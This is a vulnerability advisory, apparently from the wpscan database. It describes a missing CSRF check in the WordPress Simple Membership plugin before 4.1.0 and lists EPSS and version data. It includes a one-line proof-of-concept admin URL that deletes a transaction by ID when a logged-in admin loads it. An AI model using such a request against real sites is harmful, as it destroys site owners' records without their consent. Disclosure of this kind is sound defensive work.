Lucene search

K
wpvulndbMuhamad hidayatWPVDB-ID:C5765816-4439-4C14-A847-044248ADA0EF
HistoryFeb 25, 2022 - 12:00 a.m.

Simple Membership < 4.1.0 - Arbitrary Transaction Deletion via CSRF

2022-02-2500:00:00
muhamad hidayat
wpscan.com
3

0.001 Low

EPSS

Percentile

26.3%

The plugin does not have CSRF check in place when deleting Transactions, which could allow attackers to make a logged in admin delete arbitrary transactions via a CSRF attack

PoC

https://example.com/wp-admin/admin.php?page=simple_wp_membership_payments&amp;action;=delete_txn&amp;id;=1 will delete the transaction with ID 1

CPENameOperatorVersion
simple-membershiplt4.1.0

0.001 Low

EPSS

Percentile

26.3%

Related for WPVDB-ID:C5765816-4439-4C14-A847-044248ADA0EF